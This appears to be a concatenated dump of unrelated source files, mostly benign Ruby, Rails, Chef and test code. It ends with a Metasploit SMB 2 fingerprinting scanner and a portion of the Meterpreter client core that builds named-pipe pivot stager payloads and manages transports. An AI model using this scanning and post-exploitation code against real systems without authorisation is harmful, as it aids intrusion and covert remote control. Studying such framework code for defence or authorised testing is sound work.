  spec.homepage    = "https://github.com/ruby/bigdecimal"
  spec.license     = "ruby"

  spec.require_paths = %w[lib]
  # Native extension; built via ext/bigdecimal/extconf.rb.
  spec.extensions    = %w[ext/bigdecimal/extconf.rb]
  spec.files = %w[
    bigdecimal.gemspec
    ext/bigdecimal/bigdecimal.c
    ext/bigdecimal/bigdecimal.h
    ext/bigdecimal/depend
    ext/bigdecimal/extconf.rb
    lib/bigdecimal/jacobian.rb
    lib/bigdecimal/ludcmp.rb
    lib/bigdecimal/math.rb
    lib/bigdecimal/newton.rb
    lib/bigdecimal/util.rb
    sample/linear.rb
    sample/nlsolve.rb
    sample/pi.rb
  ]

  spec.add_development_dependency "rake", "~> 10.0"
  spec.add_development_dependency "rake-compiler", ">= 0.9"
  spec.add_development_dependency "rake-compiler-dock", ">= 0.6.1"
  spec.add_development_dependency "minitest", "< 5.0.0"
  spec.add_development_dependency "pry"
end
| 31.125 | 100 | 0.677108 |
081a7806846d7bcd74f696bd7128279987ad87e7 | 7,875 | #======================== Change in Electricity Baseload Analysis =============
require_relative 'alert_electricity_only_base.rb'
# Alert comparing last week's average electricity baseload (kW) against the
# average over the last year, projecting the annual cost impact of any
# increase.  Rating runs 10 (no increase) down to 0 (>= +30% increase); an
# increase is flagged "significant" when the rating drops below 7.
class AlertChangeInElectricityBaseloadShortTerm < AlertElectricityOnlyBase
  # A week counts as significantly above the annual average beyond +15%.
  MAXBASELOADCHANGE = 1.15
  attr_reader :average_baseload_last_year_kw, :average_baseload_last_week_kw
  attr_reader :change_in_baseload_kw, :kw_value_at_10_percent_saving
  attr_reader :last_year_baseload_kwh, :last_week_baseload_kwh
  attr_reader :last_week_change_in_baseload_kwh, :next_year_change_in_baseload_kwh
  attr_reader :last_year_baseload_£, :last_week_baseload_£, :next_year_change_in_baseload_£
  attr_reader :one_year_saving_£, :saving_in_annual_costs_through_10_percent_baseload_reduction
  attr_reader :predicted_percent_increase_in_usage, :significant_increase_in_baseload
  attr_reader :one_year_baseload_chart
  def initialize(school)
    super(school, :baseloadchangeshortterm)
  end
  # Metadata describing each template variable exposed to report templates
  # (units drive formatting downstream).
  TEMPLATE_VARIABLES = {
    average_baseload_last_year_kw: {
      description: 'average baseload over last year',
      units: :kw
    },
    average_baseload_last_week_kw: {
      description: 'average baseload over last week',
      units: :kw
    },
    change_in_baseload_kw: {
      description: 'change in baseload last week compared with the average over the last year',
      units: :kw
    },
    last_year_baseload_kwh: {
      description: 'baseload last year (kwh)',
      units: {kwh: :electricity}
    },
    last_week_baseload_kwh: {
      description: 'baseload last week (kwh)',
      units: {kwh: :electricity}
    },
    last_week_change_in_baseload_kwh: {
      description: 'change in baseload between last week and average of last year (kwh)',
      units: {kwh: :electricity}
    },
    next_year_change_in_baseload_kwh: {
      description: 'predicted impact of change in baseload over next year (kwh)',
      units: {kwh: :electricity}
    },
    last_year_baseload_£: {
      description: 'cost of the baseload electricity consumption last year',
      units: :£
    },
    last_week_baseload_£: {
      description: 'cost of the baseload electricity consumption last week',
      units: :£
    },
    next_year_change_in_baseload_£: {
      description: 'projected addition cost of change in baseload next year',
      units: :£
    },
    predicted_percent_increase_in_usage: {
      description: 'percentage increase in baseload',
      units: :percent
    },
    significant_increase_in_baseload: {
      description: 'significant increase in baseload flag',
      units: TrueClass
    },
    saving_in_annual_costs_through_10_percent_baseload_reduction: {
      description: 'cost saving if baseload reduced by 10%',
      units: :£
    },
    kw_value_at_10_percent_saving: {
      description: 'kw at 10 percent reduction on last years average baseload',
      units: :kw
    },
    one_year_baseload_chart: {
      description: 'chart of last years baseload',
      units: :chart
    }
  }.freeze
  # Symbolic id of the chart to embed alongside this alert.
  def one_year_baseload_chart
    :alert_1_year_baseload
  end
  def timescale
    'last week compared with average over last year'
  end
  # Merges this alert's template variables into those of the base class.
  def self.template_variables
    specific = {'Change In Baseload Short Term' => TEMPLATE_VARIABLES}
    specific.merge(self.superclass.template_variables)
  end
  # Computes all derived figures and the alert rating as of +asof_date+.
  def calculate(asof_date)
    @average_baseload_last_year_kw, _days_sample = annual_average_baseload_kw(asof_date)
    @kw_value_at_10_percent_saving = @average_baseload_last_year_kw * 0.9
    @average_baseload_last_week_kw = average_baseload(asof_date - 7, asof_date)
    @change_in_baseload_kw = @average_baseload_last_week_kw - @average_baseload_last_year_kw
    @predicted_percent_increase_in_usage = (@average_baseload_last_week_kw - @average_baseload_last_year_kw) / @average_baseload_last_year_kw
    hours_in_year = 365.0 * 24.0
    hours_in_week = 7.0 * 24.0
    # NOTE(review): this uses last *week's* kW for the "last year" kWh figure
    # — looks like a copy-paste slip (expected @average_baseload_last_year_kw);
    # confirm intent before changing, as last_year_baseload_£ and the 10%
    # saving figure derive from it.
    @last_year_baseload_kwh = @average_baseload_last_week_kw * hours_in_year
    @last_week_baseload_kwh = @average_baseload_last_week_kw * hours_in_week
    @last_week_change_in_baseload_kwh = @change_in_baseload_kw * hours_in_week
    @next_year_change_in_baseload_kwh = @change_in_baseload_kw * hours_in_year
    @last_year_baseload_£ = BenchmarkMetrics::ELECTRICITY_PRICE * @last_year_baseload_kwh
    @last_week_baseload_£ = BenchmarkMetrics::ELECTRICITY_PRICE * @last_week_baseload_kwh
    @next_year_change_in_baseload_£ = BenchmarkMetrics::ELECTRICITY_PRICE * @next_year_change_in_baseload_kwh
    @saving_in_annual_costs_through_10_percent_baseload_reduction = @last_year_baseload_£ * 0.1
    # Degenerate single-value Range — presumably the reporting layer expects
    # a (low, high) saving range; both bounds are the same estimate here.
    @one_year_saving_£ = Range.new(@next_year_change_in_baseload_£, @next_year_change_in_baseload_£)
    # Linear rating: 10 at no increase, 0 at a 30%+ increase, rounded to 0.1.
    @rating = [10.0 - 10.0 * [@predicted_percent_increase_in_usage / 0.3, 0.0].max, 10.0].min.round(1)
    @significant_increase_in_baseload = @rating < 7.0
    @status = @significant_increase_in_baseload ? :bad : :good
    @term = :shortterm
    @bookmark_url = add_book_mark_to_base_url('ElectricityBaseload')
  end
  # ERB template for the full alert body.
  # NOTE(review): the trailing `</end>` in the template looks like a stray
  # typo (not a real HTML tag) — confirm against the rendering layer.
  def default_content
    %{
      <p>
        <% if significant_increase_in_baseload %>
          Your electricity baseload has increased.
        <% else %>
          Your electricity baseload is good.
        <% end %>
      </p>
      <p>
        Your electricity baseload was <%= average_baseload_last_week_kw %> this week
        compared with an average of <%= average_baseload_last_year_kw %> over the last year.
      </p>
      <% if significant_increase_in_baseload %>
        <p>
          If this continues it will costs you an additional <%= one_year_saving_£ %> over the next year.
        </p>
      <% else %>
        <p>
          However, if you reduced you baseload by 10 percent from <%= average_baseload_last_year_kw %>
          to <%= kw_value_at_10_percent_saving %> by turning appliances off
          which have been left on overnight, during weekends and holidays you would save
          <%= saving_in_annual_costs_through_10_percent_baseload_reduction %> each year.
        </p>
      <% end %>
      </end>
    }.gsub(/^ /, '')
  end
  # ERB template for the one-line alert summary.
  def default_summary
    %{
      <p>
        <% if significant_increase_in_baseload %>
          Your electricity baseload has increased.
        <% else %>
          Your electricity baseload is good.
        <% end %>
      </p>
    }.gsub(/^ /, '')
  end
  # Legacy analysis path: populates @analysis_report with the same
  # good/increased verdict (threshold MAXBASELOADCHANGE) and prose figures.
  # Note: recomputes the two baselines already set by calculate(asof_date)
  # on the first line; days_sample is unused here.
  def analyse_private(asof_date)
    calculate(asof_date)
    @average_baseload_last_year_kw, days_sample = annual_average_baseload_kw(asof_date)
    @average_baseload_last_week_kw = average_baseload(asof_date - 7, asof_date)
    @analysis_report.term = :shortterm
    @analysis_report.add_book_mark_to_base_url('ElectricityBaseload')
    if @average_baseload_last_week_kw > @average_baseload_last_year_kw * MAXBASELOADCHANGE
      @analysis_report.summary = 'Your electricity baseload has increased'
      text = sprintf('Your electricity baseload has increased from %.1f kW ', @average_baseload_last_year_kw)
      text += sprintf('over the last year to %.1f kW last week. ', @average_baseload_last_week_kw)
      cost = BenchmarkMetrics::ELECTRICITY_PRICE * 365.0 * 24 * (@average_baseload_last_week_kw - @average_baseload_last_year_kw)
      text += sprintf('If this continues it will costs you an additional £%.0f over the next year.', cost)
      description1 = AlertDescriptionDetail.new(:text, text)
      @analysis_report.rating = 2.0
      @analysis_report.status = :poor
    else
      @analysis_report.summary = 'Your electricity baseload is good'
      text = sprintf('Your baseload electricity was %.2f kW this week ', @average_baseload_last_week_kw)
      text += sprintf('compared with an average of %.2f kW over the last year.', @average_baseload_last_year_kw)
      description1 = AlertDescriptionDetail.new(:text, text)
      @analysis_report.rating = 10.0
      @analysis_report.status = :good
    end
    @analysis_report.add_detail(description1)
  end
end
end | 40.178571 | 141 | 0.715683 |
21fad3d74c9d20f455fa61934c12a789ba4ce3c6 | 715 | Pod::Spec.new do |s|
s.name = 'AWSCloudWatch'
s.version = '2.9.1'
s.summary = 'Amazon Web Services SDK for iOS.'
s.description = 'The AWS SDK for iOS provides a library, code samples, and documentation for developers to build connected mobile applications using AWS.'
s.homepage = 'http://aws.amazon.com/mobile/sdk'
s.license = 'Apache License, Version 2.0'
s.author = { 'Amazon Web Services' => 'amazonwebservices' }
s.platform = :ios, '8.0'
s.source = { :git => 'https://github.com/aws/aws-sdk-ios.git',
:tag => s.version}
s.requires_arc = true
s.dependency 'AWSCore', '2.9.1'
s.source_files = 'AWSCloudWatch/*.{h,m}'
end
| 39.722222 | 157 | 0.613986 |
f76964e2c093fcd1cadb3097456f7736d85df961 | 2,150 | describe 'Conditionally required fields', js: true do
before do
login
end
context 'when viewing an empty form' do
let(:draft) { create(:empty_variable_draft, user: User.where(urs_uid: 'testuser').first) }
context 'when viewing a form with always required fields' do
before do
visit edit_variable_draft_path(draft)
end
it 'displays the required icons' do
expect(page).to have_css('label.eui-required-o', count: 7)
end
end
context 'when viewing a form with conditionally required fields' do
before do
visit edit_variable_draft_path(draft, 'fill_values')
end
it 'does not display required icons' do
expect(page).to have_no_css('label.eui-required-o')
end
context 'when filling in a form field that causes fields to become required' do
before do
fill_in 'Description', with: 'testing'
find('body').click
end
it 'displays the required icons' do
expect(page).to have_css('label.eui-required-o', count: 2)
end
context 'when clearing a field that causes fields to become required' do
before do
fill_in 'Description', with: ''
end
it 'removes the required icons' do
expect(page).to have_no_css('label.eui-required-o')
end
end
end
end
end
context 'when viewing a form with data' do
let(:draft) { create(:full_variable_draft, user: User.where(urs_uid: 'testuser').first) }
context 'when viewing a form with always required fields' do
before do
visit edit_variable_draft_path(draft)
end
it 'displays the required icons' do
expect(page).to have_css('label.eui-required-o', count: 7)
end
end
context 'when viewing a form with conditionally required fields' do
before do
visit edit_variable_draft_path(draft, 'fill_values')
end
it 'displays the required icons' do
# 4 because 2 sets of fill_values
expect(page).to have_css('label.eui-required-o', count: 4)
end
end
end
end
| 28.289474 | 94 | 0.637209 |
b98e903c9c469b18207199dc29f16c7a10967ec5 | 670 | module TokenAuthenticatable
extend ActiveSupport::Concern
included do
before_filter :authenticate_player_from_token!
before_filter :authenticate_player!
end
private
def authenticate_player_from_token!
auth_token = params[:auth_token].presence
player = auth_token && Player.find_by_authentication_token(auth_token.to_s)
if player
# Notice we are passing store false, so the player is not
# actually stored in the session and a token is needed
# for every request. If you want the token to work as a
# sign in token, you can simply remove store: false.
sign_in player, store: false
end
end
end
| 25.769231 | 85 | 0.723881 |
28a2586ff8d365c454c7bd9028a9a7c872ad5f61 | 572 | FactoryBot.define do
factory :feedback_comment, class: Comment do
account
content { generate :lorem_ipsum }
name { "feedback" }
term
commentable { create(:submission) }
end
factory :notes_comment, class: Comment do
account
content { generate :lorem_ipsum }
name { "internal_notes" }
term
commentable { create(:submission) }
end
factory :explanations_comment, class: Comment do
account
content { generate :lorem_ipsum }
name { "explanations" }
term
commentable { create(:fixed_evaluation) }
end
end
| 22 | 50 | 0.674825 |
62af6c95fd2e83347c6b7d648bc193ecd770cac3 | 1,959 | #
# Author:: Stephan Renatus <[email protected]>
# Copyright:: Copyright (c) 2016 Chef Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# If the file is there, we don't care where it came from;
# otherwise, generate the keys.
#
# The reason we're not checking anything more specific here is that
# the preflight_bootstrap_validator checks ensure that either the key is
# present (that is, it was copied here), or will be generated because _this_
# is the node adding the pivotal user.
pivotal_key_path = "/etc/opscode/pivotal.pem"
# File.exist? replaces the File.exists? alias, which is deprecated and
# removed entirely in Ruby 3.2.
new_pivotal = !File.exist?(pivotal_key_path)
pivotal_key = OpenSSL::PKey::RSA.generate(2048) if new_pivotal
# Setting at the top level so that we don't export this to chef-server-running.json
# NOTE(review): node.set is deprecated in newer Chef releases (use
# node.normal / node.override); left unchanged to avoid altering behaviour
# on the Chef version this cookbook targets -- confirm before upgrading.
node.set['bootstrap']['superuser_public_key'] = pivotal_key.public_key.to_s if new_pivotal
file pivotal_key_path do
  owner OmnibusHelper.new(node).ownership['owner']
  group "root"
  mode "0600"
  content pivotal_key.to_pem.to_s if new_pivotal
  sensitive true
end
webui_priv_key_path = "/etc/opscode/webui_priv.pem"
new_webui = !File.exist?(webui_priv_key_path)
webui_key = OpenSSL::PKey::RSA.generate(2048) if new_webui
file "/etc/opscode/webui_pub.pem" do
  owner "root"
  group "root"
  mode "0644"
  content webui_key.public_key.to_s if new_webui
end
file webui_priv_key_path do
  owner OmnibusHelper.new(node).ownership['owner']
  group "root"
  mode "0600"
  content webui_key.to_pem.to_s if new_webui
end
| 33.775862 | 90 | 0.764676 |
62db907c56302199d354075338f3495cbfdc80b6 | 627 | module Leg
module Markdown
class HTMLRouge < Redcarpet::Render::HTML
include Rouge::Plugins::Redcarpet
end
HTML_RENDERER = HTMLRouge.new(with_toc_data: true)
MARKDOWN_RENDERER = Redcarpet::Markdown.new(HTML_RENDERER, fenced_code_blocks: true)
def self.render(source)
html = MARKDOWN_RENDERER.render(source)
html = Redcarpet::Render::SmartyPants.render(html)
html.gsub!(/<\/code>‘/) { "</code>’" }
html.gsub!(/^\s*<h([23456]) id="([^"]+)">(.+)<\/h\d>$/) {
"<h#{$1} id=\"#{$2}\"><a href=\"##{$2}\">#{$3}</a></h#{$1}>"
}
html
end
end
end
| 29.857143 | 88 | 0.583732 |
911d13dd4141ed8a491314fba4572fb023b69023 | 250 | module Kubes::Docker::Strategy::Build
class Docker < Base
def perform
params = args.flatten.join(' ')
command = "docker build #{params}"
run_hooks("docker.rb", name: "build") do
sh(command)
end
end
end
end
| 20.833333 | 46 | 0.596 |
f82d8c17e6b1dd109cae8603e3a60e46adf3c48c | 93 | # desc "Explaining what the task does"
# task :acts_as_rateable do
# # Task goes here
# end | 23.25 | 38 | 0.709677 |
87431cde248017630e5051fad46ffd2dd904604b | 3,050 | # frozen_string_literal: false
# @!parse
# class ActiveRecord::Migration
# # Create a composite type
# #
# # @param [#to_s] name (nil) The qualified name of the type
# # @option options [#to_s] :comment (nil) The comment describing the constraint
# # @yield [t] the block with the type's definition
# # @yieldparam Object receiver of methods specifying the type
# # @return [void]
# #
# # ```ruby
# # create_composite_type "paint.colored_point" do |d|
# # d.column "x", "integer"
# # d.column "y", "integer"
# # d.column "color", "text", collation: "en_US"
# # d.comment <<~COMMENT
# # 2D point with color
# # COMMENT
# # end
# # ```
# #
# # It is always reversible.
# def create_composite_type(name, **options, &block); end
# end
module PGTrunk::Operations::CompositeTypes
# @private
class CreateCompositeType < Base
validates :force, :if_exists, :new_name, absence: true
from_sql do |_version|
<<~SQL
SELECT
t.oid,
(t.typnamespace::regnamespace || '.' || t.typname) AS name,
(
SELECT
json_agg(
json_build_object(
'name', a.attname,
'type', format_type(a.atttypid, a.atttypmod),
'collation', (
CASE
WHEN c.collnamespace != 'pg_catalog'::regnamespace
THEN c.collnamespace::regnamespace || '.' || c.collname
WHEN c.collname != 'default'
THEN c.collname
END
)
) ORDER BY a.attnum
)
FROM pg_attribute a
LEFT JOIN pg_collation c ON c.oid = a.attcollation
WHERE a.attrelid = t.typrelid
AND EXISTS (SELECT FROM pg_type WHERE a.atttypid = pg_type.oid)
) AS columns,
d.description AS comment
FROM pg_type t
JOIN pg_trunk e ON e.oid = t.oid
AND e.classid = 'pg_type'::regclass
LEFT JOIN pg_description d ON d.objoid = t.oid
AND d.classoid = 'pg_type'::regclass
WHERE t.typtype = 'c';
SQL
end
def to_sql(_version)
[create_type, *create_comment, register_type].join(" ")
end
def invert
DropCompositeType.new(**to_h)
end
private
def create_type
<<~SQL.squish
CREATE TYPE #{name.to_sql}
AS (#{columns.reject(&:change).map(&:to_sql).join(',')});
SQL
end
def create_comment
return if comment.blank?
"COMMENT ON TYPE #{name.to_sql} IS $comment$#{comment}$comment$;"
end
def register_type
<<~SQL.squish
INSERT INTO pg_trunk (oid, classid)
SELECT oid, 'pg_type'::regclass
FROM pg_type
WHERE typname = #{name.quoted}
AND typnamespace = #{name.namespace}
AND typtype = 'c'
ON CONFLICT DO NOTHING;
SQL
end
end
end
| 29.326923 | 84 | 0.540328 |
f8cc07f2d083b5f4643e2e304ae32f09401689f1 | 1,562 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe MemoizeBlock, '#memoize' do
let(:memoized_name) { nil }
let(:returned_value) { 'default' }
let(:action) { ->(returned) { return returned } }
def memoize_result
memoize(memoized_name) do
action.call(returned_value)
end
end
context 'given standard behavior' do
it 'memoizes the result' do
expect(action).to receive(:call).exactly(1).times
2.times.each { memoize_result }
end
it 'stores the result in a default ivar' do
expect { memoize_result }.to change { instance_variable_defined?('@_memoize_result') }.to(true)
end
end
context 'given a nil result' do
let(:returned_value) { nil }
it 'memoizes the result' do
expect(action).to receive(:call).exactly(1).times
2.times.each { memoize_result }
end
end
context 'given a custom ivar name' do
let(:memoized_name) { 'custom_ivar_name' }
it 'allows the ivar name to be defined' do
expect { memoize_result }.to change { instance_variable_defined?("@_#{memoized_name}") }.to(true)
end
end
context 'given an invalid custom ivar name' do
let(:memoized_name) { '@custom_ivar_name' }
it 'raises an error' do
expect { memoize_result }.to raise_error(StandardError, /invalid/)
end
end
context 'given an invalid method name' do
def memoize_result!
memoize { action.call }
end
it 'raises an error' do
expect { memoize_result! }.to raise_error(StandardError, /invalid/)
end
end
end
| 24.40625 | 103 | 0.670935 |
bf1ee7698781159b2ee23e51235675a2f72a5125 | 755 | module HealthSeven::V2_7_1
class Ndl < ::HealthSeven::DataType
# Name
attribute :name, Cnn, position: "NDL.1"
# Start Date/time
attribute :start_date_time, Dtm, position: "NDL.2"
# End Date/time
attribute :end_date_time, Dtm, position: "NDL.3"
# Point of Care
attribute :point_of_care, Is, position: "NDL.4"
# Room
attribute :room, Is, position: "NDL.5"
# Bed
attribute :bed, Is, position: "NDL.6"
# Facility
attribute :facility, Hd, position: "NDL.7"
# Location Status
attribute :location_status, Is, position: "NDL.8"
# Patient Location Type
attribute :patient_location_type, Is, position: "NDL.9"
# Building
attribute :building, Is, position: "NDL.10"
# Floor
attribute :floor, Is, position: "NDL.11"
end
end | 29.038462 | 57 | 0.692715 |
38566f64accf003aa84209513a39ed127880f0b0 | 2,868 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should go first
include Msf::Exploit::Remote::Tcp
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Aliases for common classes
SIMPLE = Rex::Proto::SMB::SimpleClient
XCEPT = Rex::Proto::SMB::Exceptions
CONST = Rex::Proto::SMB::Constants
def initialize
super(
'Name' => 'SMB 2.0 Protocol Detection',
'Version' => '$Revision$',
'Description' => 'Detect systems that support the SMB 2.0 protocol',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
register_options([ Opt::RPORT(445) ], self.class)
end
# Fingerprint a single host
def run_host(ip)
begin
connect
# The SMB 2 dialect must be there
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002', 'SMB 2.???']
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0xc853
pkt['Payload'].v['Payload'] = data
pkt['Payload']['SMB'].v['ProcessID'] = rand(0x10000)
pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000)
sock.put(pkt.to_s)
res = sock.get_once
if(res and res.index("\xfeSMB"))
if(res.length >= 124)
vers = res[72,2].unpack("CC").map{|c| c.to_s}.join(".")
ctime = Rex::Proto::SMB::Utils.time_smb_to_unix(*(res[108,8].unpack("VV").reverse))
btime = Rex::Proto::SMB::Utils.time_smb_to_unix(*(res[116,8].unpack("VV").reverse))
utime = ctime - btime
print_status("#{ip} supports SMB 2 [dialect #{vers}] and has been online for #{utime/3600} hours")
#Add Report
report_note(
:host => ip,
:proto => 'tcp',
:sname => 'smb2',
:port => rport,
:type => "supports SMB 2 [dialect #{vers}]",
:data => "supports SMB 2 [dialect #{vers}] and has been online for #{utime/3600} hours"
)
else
print_status("#{ip} supports SMB 2.0")
#Add Report
report_note(
:host => ip,
:proto => 'tcp',
:sname => 'smb2',
:port => rport,
:type => "supports SMB 2.0",
:data => "supports SMB 2.0"
)
end
end
rescue ::Rex::ConnectionError
rescue ::Exception => e
print_error("#{rhost}: #{e.class} #{e} #{e.backtrace}")
ensure
disconnect
end
end
end
| 28.117647 | 150 | 0.615063 |
1810e44ce706c7c7383830de4a00e36785999cee | 2,407 | # Copyright (c) 2018 Public Library of Science
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
require 'rails_helper'
describe TahiStandardTasks::ReviewerRecommendation do
describe "validations" do
let(:recommendation) { FactoryGirl.build(:reviewer_recommendation) }
it "is valid" do
expect(recommendation.valid?).to be(true)
end
it "requires an :first_name" do
recommendation.first_name = nil
expect(recommendation.valid?).to be(false)
end
it "requires an :last_name" do
recommendation.last_name = nil
expect(recommendation.valid?).to be(false)
end
it "requires an :email" do
recommendation.email = nil
expect(recommendation.valid?).to be(false)
end
end
describe "#paper" do
let(:recommendation) { FactoryGirl.create(:reviewer_recommendation) }
it "always proxies to paper" do
expect(recommendation.paper).to eq(recommendation.reviewer_recommendations_task.paper)
end
end
describe '#task' do
let!(:task) { FactoryGirl.create(:reviewer_recommendations_task) }
let!(:recommendation) do
FactoryGirl.create(
:reviewer_recommendation,
reviewer_recommendations_task: task
)
end
it 'always proxies to reviewer_recommendations_task' do
expect(recommendation.task)
.to eq(recommendation.reviewer_recommendations_task)
end
end
end
| 34.884058 | 92 | 0.738679 |
21c7be285a572bc1316062c15eeba5c1a23367cd | 28,684 | # -*- coding: binary -*-
require 'rex/post/meterpreter/packet'
require 'rex/post/meterpreter/core_ids'
require 'rex/post/meterpreter/extension'
require 'rex/post/meterpreter/extension_mapper'
require 'rex/post/meterpreter/client'
# certificate hash checking
require 'rex/socket/x509_certificate'
require 'openssl'
module Rex
module Post
module Meterpreter
###
#
# This class is responsible for providing the interface to the core
# client-side meterpreter API which facilitates the loading of extensions
# and the interaction with channels.
#
#
###
class ClientCore < Extension
METERPRETER_TRANSPORT_TCP = 0
METERPRETER_TRANSPORT_HTTP = 1
METERPRETER_TRANSPORT_HTTPS = 2
VALID_TRANSPORTS = {
'reverse_tcp' => METERPRETER_TRANSPORT_TCP,
'reverse_http' => METERPRETER_TRANSPORT_HTTP,
'reverse_https' => METERPRETER_TRANSPORT_HTTPS,
'bind_tcp' => METERPRETER_TRANSPORT_TCP
}
include Rex::Payloads::Meterpreter::UriChecksum
def self.extension_id
EXTENSION_ID_CORE
end
#
# Initializes the 'core' portion of the meterpreter client commands.
#
def initialize(client)
super(client, 'core')
end
##
#
# Core commands
#
##
#
# create a named pipe pivot
#
def create_named_pipe_pivot(opts)
request = Packet.create_request(COMMAND_ID_CORE_PIVOT_ADD)
request.add_tlv(TLV_TYPE_PIVOT_NAMED_PIPE_NAME, opts[:pipe_name])
c = Class.new(::Msf::Payload)
c.include(::Msf::Payload::Stager)
c.include(::Msf::Payload::TransportConfig)
# Include the appropriate reflective dll injection module for the target process architecture...
# Used to generate a reflective DLL when migrating. This is yet another
# argument for moving the meterpreter client into the Msf namespace.
if opts[:arch] == ARCH_X86
c.include(::Msf::Payload::Windows::MeterpreterLoader)
elsif opts[:arch] == ARCH_X64
c.include(::Msf::Payload::Windows::MeterpreterLoader_x64)
end
stage_opts = {
force_write_handle: true,
datastore: {
'PIPEHOST' => opts[:pipe_host],
'PIPENAME' => opts[:pipe_name]
}
}
stager = c.new()
stage_opts[:transport_config] = [stager.transport_config_reverse_named_pipe(stage_opts)]
stage = stager.stage_payload(stage_opts)
request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA, stage)
self.client.send_request(request)
end
#
# Get a list of loaded commands for the given extension.
#
# @param [String, Integer] extension Either the extension name or the extension ID to load the commands for.
#
# @return [Array<Integer>] An array of command IDs that are supported by the specified extension.
def get_loaded_extension_commands(extension)
request = Packet.create_request(COMMAND_ID_CORE_ENUMEXTCMD)
# handle 'core' as a special case since it's not a typical extension
extension = EXTENSION_ID_CORE if extension == 'core'
extension = Rex::Post::Meterpreter::ExtensionMapper.get_extension_id(extension) unless extension.is_a? Integer
request.add_tlv(TLV_TYPE_UINT, extension)
request.add_tlv(TLV_TYPE_LENGTH, COMMAND_ID_RANGE)
begin
response = self.client.send_packet_wait_response(request, self.client.response_timeout)
rescue
# In the case where orphaned shells call back with OLD copies of the meterpreter
# binaries, we end up with a case where this fails. So here we just return the
# empty list of supported commands.
return []
end
# No response?
if response.nil?
raise RuntimeError, 'No response was received to the core_enumextcmd request.', caller
elsif response.result != 0
# This case happens when the target doesn't support the core_enumextcmd message.
# If this is the case, then we just want to ignore the error and return an empty
# list. This will force the caller to load any required modules.
return []
end
commands = []
response.each(TLV_TYPE_UINT) { |c|
commands << c.value
}
commands
end
def transport_list
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_LIST)
response = client.send_request(request)
result = {
:session_exp => response.get_tlv_value(TLV_TYPE_TRANS_SESSION_EXP),
:transports => []
}
response.each(TLV_TYPE_TRANS_GROUP) { |t|
result[:transports] << {
:url => t.get_tlv_value(TLV_TYPE_TRANS_URL),
:comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT),
:retry_total => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL),
:retry_wait => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT),
:ua => t.get_tlv_value(TLV_TYPE_TRANS_UA),
:proxy_host => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST),
:proxy_user => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER),
:proxy_pass => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS),
:cert_hash => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH),
:custom_headers => t.get_tlv_value(TLV_TYPE_TRANS_HEADERS)
}
}
result
end
#
# Set associated transport timeouts for the currently active transport.
#
def set_transport_timeouts(opts={})
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS)
if opts[:session_exp]
request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
end
if opts[:comm_timeout]
request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, opts[:comm_timeout])
end
if opts[:retry_total]
request.add_tlv(TLV_TYPE_TRANS_RETRY_TOTAL, opts[:retry_total])
end
if opts[:retry_wait]
request.add_tlv(TLV_TYPE_TRANS_RETRY_WAIT, opts[:retry_wait])
end
response = client.send_request(request)
{
:session_exp => response.get_tlv_value(TLV_TYPE_TRANS_SESSION_EXP),
:comm_timeout => response.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT),
:retry_total => response.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL),
:retry_wait => response.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT)
}
end
#
# Loads a library on the remote meterpreter instance. This method
# supports loading both extension and non-extension libraries and
# also supports loading libraries from memory or disk depending
# on the flags that are specified
#
# Supported flags:
#
# LibraryFilePath
# The path to the library that is to be loaded
#
# LibraryFileImage
# Binary object containing the library to be loaded
